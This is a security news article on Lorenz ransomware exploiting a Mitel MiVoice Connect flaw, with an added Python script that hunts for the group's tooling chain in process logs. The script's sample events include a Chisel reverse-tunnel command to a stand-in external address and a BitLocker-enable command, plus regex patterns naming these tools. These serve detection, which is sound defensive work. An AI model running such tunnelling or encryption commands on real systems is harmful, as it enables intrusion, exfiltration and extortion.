
The Lorenz ransomware operators have been exploiting a previously patched critical security vulnerability in Mitel MiVoice Connect to gain initial access to target environments, using the compromised appliance as a foothold for follow-on intrusion activity.

“The first malicious activity was carried out by a Mitel appliance located on the network perimeter,” researchers from cybersecurity firm Arctic Wolf revealed in a report published this week.

“Lorenz exploited CVE-2022-29499, a remote code execution vulnerability in the Mitel Service Appliance component of MiVoice Connect, to gain a reverse shell and subsequently utilise Chisel as a tunnelling tool to pivot into the network.”

Like many other ransomware groups, Lorenz is known for double extortion, in which data is stolen before systems are encrypted. Since February 2021, the actor has targeted small and medium businesses (SMBs) in the United States, China, and Mexico, as well as a smaller number of enterprises in France and Germany.

Cybereason has described Lorenz as an “ever-evolving ransomware,” and the group is believed to be a rebranding of the ‘.sZ40’ ransomware first seen in October 2020.

This is not the first time Mitel VoIP appliances have been weaponised for ransomware attacks. CrowdStrike earlier uncovered an attempted ransomware intrusion that used the same tactic to gain remote code execution against an unnamed target.

Mitel VoIP appliances are also an attractive entry point because, as security researcher Kevin Beaumont has shown, almost 20,000 of them are exposed to the internet, leaving them open to exploitation.

In one Lorenz ransomware infection investigated by Arctic Wolf, the attackers used the remote code execution flaw to create a reverse shell and download the Chisel proxy software.

This indicates that the threat actors have working access to an exploit for CVE-2022-29499, either obtained through an initial access broker (IAB) who holds one or developed by the group itself.

The researchers also noted that the Lorenz group waited nearly a month after gaining initial access before carrying out post-exploitation actions such as establishing persistence with a web shell, harvesting credentials, performing network reconnaissance, escalating privileges, and moving laterally.

The compromise culminated in stolen data being exfiltrated with FileZilla, after which the hosts were encrypted using Microsoft’s built-in BitLocker drive encryption. This underscores that adversaries still frequently abuse legitimate software and living-off-the-land binaries (LOLBINs), which blend in with routine administrative activity and rarely trip signature-based controls.
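The tooling chain described above (Chisel for tunnelling, FileZilla for exfiltration, BitLocker enabled through manage-bde for encryption) is made of legitimate binaries, so a hunt has to key on how they are invoked and on several stages co-occurring on one host rather than on the binaries themselves. The following is an added example, not code from the original article or from Arctic Wolf: it runs simple stage-matching rules over constructed Windows process-creation events (Sysmon Event ID 1 / Security 4688 style) and reports hosts where more than one stage of the chain has been observed. The event records, host names, user names and the 203.0.113.10 address are all made up for illustration.

```python
"""Hunt for the Lorenz post-exploitation tooling chain (Chisel tunnel,
FileZilla transfer, BitLocker encryption via manage-bde) in Windows
process-creation telemetry.

Added example; the events below are constructed for illustration and are
not telemetry from the Arctic Wolf investigation.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed sample events (hypothetical hosts, users and paths).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "fs01", "user": "svc_backup",
     "image": r"C:\Windows\System32\manage-bde.exe",
     "cmdline": "manage-bde -on C: -RecoveryPassword -UsedSpaceOnly"},
    {"host": "fs01", "user": "svc_backup",
     "image": r"C:\Users\svc_backup\Downloads\filezilla.exe",
     "cmdline": "filezilla.exe"},
    {"host": "ws07", "user": "jdoe",
     "image": r"C:\Users\Public\chisel.exe",
     "cmdline": "chisel.exe client 203.0.113.10:8080 R:socks"},
    {"host": "dc01", "user": "admin",
     "image": r"C:\Windows\System32\manage-bde.exe",
     "cmdline": "manage-bde -status C:"},   # benign status query, must not match
    {"host": "ws02", "user": "asmith",
     "image": r"C:\Program Files\FileZilla FTP Client\filezilla.exe",
     "cmdline": '"C:\\Program Files\\FileZilla FTP Client\\filezilla.exe"'},
]

# Each rule: (stage name, image-basename regex, command-line regex); both must match.
# Attackers often rename dropped binaries, so the Chisel rule also keys on its
# characteristic "client ... R:socks" / "server --reverse" arguments.
RULES = [
    ("bitlocker_enable",
     r"^manage-bde\.exe$",
     r"(?i)(^|\s)-on\s"),            # "-on" turns encryption on; "-status" does not
    ("chisel_tunnel",
     r".*",
     r"(?i)\bchisel(\.exe)?\s+(client|server)\b|\bR:(\d+:)?socks\b|--reverse\b"),
    ("filezilla_transfer",
     r"^filezilla\.exe$",
     r".*"),
]


def basename(image: str) -> str:
    """Return the file name part of a Windows (or POSIX) image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1]


def match_stages(event: Dict[str, str]) -> Set[str]:
    """Return the set of chain stages a single process-creation event matches."""
    name = basename(event["image"])
    stages: Set[str] = set()
    for stage, image_re, cmd_re in RULES:
        if re.search(image_re, name, re.I) and re.search(cmd_re, event["cmdline"]):
            stages.add(stage)
    return stages


def stages_by_host(events: List[Dict[str, str]]) -> Dict[str, Set[str]]:
    """Aggregate matched stages per host, dropping hosts with no matches."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for event in events:
        seen[event["host"]] |= match_stages(event)
    return {host: stages for host, stages in seen.items() if stages}


def hosts_with_chain(events: List[Dict[str, str]], min_stages: int = 2) -> List[str]:
    """Hosts on which at least `min_stages` distinct stages of the chain were seen."""
    return sorted(host for host, stages in stages_by_host(events).items()
                  if len(stages) >= min_stages)


if __name__ == "__main__":
    for host, stages in stages_by_host(SAMPLE_EVENTS).items():
        print(f"{host}: {sorted(stages)}")
    print("hosts with multi-stage activity:", hosts_with_chain(SAMPLE_EVENTS))
```

On the constructed data only fs01 surfaces as multi-stage (BitLocker enabled and FileZilla launched under the same service account), while ws02, where a user simply opened an installed FileZilla client, and dc01, where an administrator queried BitLocker status, do not. In production, `manage-bde -on` and FileZilla both occur legitimately, so baseline them per host role and treat the single-stage hits as leads to pivot from (for example, into the web-server logs for the web shell the researchers mention) rather than as alerts on their own.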

The researchers noted that “monitoring just critical assets is not enough for organizations,” and that defenders should instead cover every externally facing device, including VoIP and IoT appliances. As threat actors shift to lesser-known or unmonitored assets, initial access becomes harder to detect until the intruder is already inside the network.
